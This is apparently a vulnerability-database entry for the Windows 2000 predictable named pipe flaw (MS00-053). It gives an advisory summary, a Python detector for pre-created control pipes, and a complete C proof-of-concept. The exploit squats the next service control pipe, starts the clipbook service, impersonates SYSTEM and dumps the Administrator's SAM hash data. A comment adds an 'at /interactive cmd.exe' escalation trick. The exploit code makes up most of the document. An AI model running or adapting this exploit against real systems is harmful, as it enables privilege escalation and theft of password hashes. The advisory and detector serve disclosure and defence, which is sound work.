Microsoft Windows 2000 Predictable Named Pipe Vulnerability (MS00-053)

Vulnerability ID: 1105942    Vulnerability type: Unknown
Published: 2000-08-01    Updated: 2005-10-12
CVE ID: CVE-2000-0737
CNNVD-ID: CNNVD-200010-116
Platform: Windows    CVSS score: 4.6
|Vulnerability sources
https://www.exploit-db.com/exploits/20133
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200010-116
|Vulnerability details
Microsoft Windows is a family of operating systems released by Microsoft Corporation (USA). The Service Control Manager (services.exe) is an administrative component of Windows 2000 that allows system services to be created or modified. The SCM creates a named pipe each time a service is started. If a malicious program can predict the name of a particular service's pipe and create that pipe before the service starts, it can assume the service's security context. This may allow an attacker to run malicious code with the privileges of a specific user or of Local System.
|Exploit
source: http://www.securityfocus.com/bid/1535/info

The Service Control Manager (SCM) is an administrative tool in Windows 2000 which handles the creation and modification of system services such as Server, Workstation, Alerter, and ClipBook. A server-side named pipe is created before each service is started, and the pipes are named in a predictable sequence whose current index can be read from:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ServiceCurrent

Due to the predictability of subsequent named pipes, any local user logged on interactively to a Windows 2000 machine is able to create a server-side named pipe and assume the security context of the system service the next time it is started. Arbitrary code could be attached to the named pipe, making it possible for the local user to craft an exploit that would allow them to gain Administrator account status.
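As an added defender-side check (not part of the advisory or of the PoC that follows), the logic below compares the ServiceCurrent counter with the control pipes that already exist and flags any NtControlPipe whose index is ahead of the counter; on the unpatched Windows 2000 behaviour described above such a pipe can only have been pre-created by a process other than the SCM. The function names and the sample pipe list are constructed for this example; the registry read and pipe enumeration run only on Windows.

```python
import os
import re
from typing import Iterable, List

# The SCM names its per-service control pipes NtControlPipe<N> (see advisory text above).
CONTROL_PIPE_RE = re.compile(r"NtControlPipe(\d+)$")
SERVICE_CURRENT_KEY = r"SYSTEM\CurrentControlSet\Control\ServiceCurrent"


def squatted_control_pipes(service_current: int, pipe_names: Iterable[str]) -> List[str]:
    """Return control-pipe names whose index is ahead of the SCM counter.

    The SCM uses ServiceCurrent + 1 for the next pipe and creates it only when it
    starts a service, so a pipe with a higher index that already exists was
    pre-created by some other process (the condition the PoC below relies on).
    """
    suspicious = []
    for name in pipe_names:
        match = CONTROL_PIPE_RE.search(name)
        if match and int(match.group(1)) > service_current:
            suspicious.append(name)
    return suspicious


def read_service_current() -> int:
    """Read the default value of the ServiceCurrent key (REG_DWORD). Windows only."""
    import winreg  # standard library module that exists only on Windows
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, SERVICE_CURRENT_KEY) as key:
        value, _kind = winreg.QueryValueEx(key, "")
    return int(value)


def list_pipes() -> List[str]:
    """Enumerate the names present in the local named-pipe namespace. Windows only."""
    return os.listdir("\\\\.\\pipe\\")


# Constructed sample: counter 7; pipes 3 and 7 belong to running services, while
# pipe 8 already exists although the SCM has not started another service yet.
SAMPLE_COUNTER = 7
SAMPLE_PIPES = ["lsass", "srvsvc", r"net\NtControlPipe3", r"net\NtControlPipe7", r"net\NtControlPipe8"]


def main() -> None:
    on_windows = os.name == "nt"
    counter = read_service_current() if on_windows else SAMPLE_COUNTER
    pipes = list_pipes() if on_windows else SAMPLE_PIPES
    for name in squatted_control_pipes(counter, pipes):
        print(f"ServiceCurrent={counter}: control pipe created ahead of the SCM: {name}")


if __name__ == "__main__":
    main()
```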

/*
 *  Proof of Concept
 *  Windows2000 services named pipe vulnerability
 *
 *  Author:  Maceo
 *
 *  Compiled with MS VC++ 6.0 SP3
 *
 *  Compiled and tested on:
 *     D:\>uname -sv
 *     Windows2000 5.0.2195
 *
 *  Vulnerability:  Windows 2000 uses predictable named
 *  pipe names for controlling services.  Any user process
 *  can create a named pipe with the next name and force
 *  a service, they can start, to connect to the pipe.  Once
 *  connected the user process can impersonate the service,
 *  which in most cases runs in the SYSTEM account.
 *
 *  Proof of concept:  This code abuses the clipbook service
 *  to run as the SYSTEM account and then dumps information
 *  from the local SAM database.
 *
 *  This file is for educational purposes only.  As many
 *  would agree, the default install of a W2K server is
 *  inherently insecure against interactive users.  One
 *  does not have to dig very hard to find a way to
 *  elevate a users privileges when placed in an interactive
 *  situation, such as logged in at a console.  For instance:
 *     D:\>time
 *     The current time is: 23:28:38.42
 *     D:\>at 23:29 /interactive cmd.exe
 *
 *  It is with this in mind I release the following code.
 *
 *  Disclaimer: This file is intended as proof of concept, and
 *  is not intended to be used for illegal purposes. The author
 *  does not accept responsibility for ANY damage incurred
 *  by the use of it.
 *
 */


#include <stdio.h>
#include <windows.h>

#define ABUSE_SVC "clipbook"
#define SVC_KEY "SYSTEM\\CurrentControlSet\\Control\\ServiceCurrent"
#define SAM_KEY "SAM\\SAM\\Domains\\Account\\Users\\000001F4"


int main(void)
{
  HKEY hOpen;
  DWORD dwNumber = 0;
  DWORD dwType = REG_DWORD;
  DWORD dwSize = sizeof(DWORD);
  DWORD i;
  char szNetCmd[256];


  // make sure the service we want to abuse is stopped. //
  sprintf (szNetCmd, "net stop %s", ABUSE_SVC);
  system (szNetCmd);


  // open the current service number key //
  if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, SVC_KEY, 0, KEY_READ, &hOpen))
  {
    printf ("Failed to open key:\n  %s\n", SVC_KEY);
    return 1;
  }

  // read the key (the default value holds the current pipe index) //
  if (RegQueryValueEx (hOpen, "", NULL, &dwType, (BYTE *) &dwNumber, &dwSize))
  {
    RegCloseKey (hOpen);
    printf ("Failed to read key:\n  %s\n", SVC_KEY);
    return 2;
  }

  // close the key //
  RegCloseKey (hOpen);


  // build the next named pipe name //
  char szPipe[64];
  sprintf(szPipe, "\\\\.\\pipe\\net\\NtControlPipe%lu", ++dwNumber);


  // create the named pipe before scm can //
  HANDLE hPipe = 0;
  hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX,
                           PIPE_TYPE_MESSAGE|PIPE_WAIT,
                           2, 0, 0, 0, NULL);
  if (hPipe == INVALID_HANDLE_VALUE)
  {
    printf ("Failed to create named pipe:\n  %s\n", szPipe);
    return 3;
  }


  // start the service we are going to abuse. //
  sprintf(szNetCmd, "start /min net start %s", ABUSE_SVC);
  system(szNetCmd);


  // wait for the service to connect //
  ConnectNamedPipe (hPipe, NULL);


  // read a byte of data from the client //
  if (!ReadFile (hPipe, (void *) &dwNumber, 4, &dwSize, NULL))
  {
    printf ("Failed to read the named pipe.\n");
    CloseHandle(hPipe);
    return 4;
  }


  // assume the identity of the client //
  if (!ImpersonateNamedPipeClient (hPipe))
  {
    printf ("Failed to impersonate the named pipe.\n");
    CloseHandle(hPipe);
    return 5;
  }


  // display impersonating users name //
  dwSize  = 256;
  char szUser[256];
  GetUserName(szUser, &dwSize);
  printf ("Impersonating: %s\n", szUser);


  // Assume we are SYSTEM since it is the default,
  // and let's crack open the SAM database and
  // lookup rid 500 (Administrator unless name has been changed)

  if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, SAM_KEY, 0, KEY_READ, &hOpen))
  {
    printf ("Failed to open key:\n  %s\n", SAM_KEY);
    CloseHandle(hPipe);
    return 1;
  }


  // read the F key //
  dwSize = 2048;
  BYTE szData[2048];
  if (RegQueryValueEx (hOpen, "F", NULL, &dwType, szData, &dwSize))
  {
    RegCloseKey (hOpen);
    printf ("Failed to read key:\n  %s\\F\n", SAM_KEY);
    CloseHandle(hPipe);
    return 2;
  }


  // output the key //
  printf ("Dumping SAM for RID 500 ...\n\n");
  printf ("F:0x");
  for (i = 0; i < dwSize; i++)
  { printf ("%2.2x", (DWORD) szData[i]); }
  printf ("\n\n");


  // read the V key //
  dwSize = 2048;
  if (RegQueryValueEx (hOpen, "V", NULL, &dwType, szData, &dwSize))
  {
    RegCloseKey (hOpen);
    printf ("Failed to read key:\n  %s\\V\n", SAM_KEY);
    CloseHandle(hPipe);
    return 2;
  }


  // output the key //
  printf ("V:0x");
  for (i = 0; i < dwSize; i++)
  { printf ("%2.2x", (DWORD) szData[i]); }
  printf ("\n");


  // clean up: drop the impersonation token and release handles //
  RevertToSelf();
  RegCloseKey (hOpen);
  CloseHandle(hPipe);
  return 0;
}
|References

Source: BID    Name: 1535    Link: http://www.securityfocus.com/bid/1535
Source: MS    Name: MS00-053    Link: http://www.microsoft.com/technet/security/bulletin/ms00-053.asp
Source: NSFOCUS    Name: 8268    Link: http://www.nsfocus.net/vulndb/8268
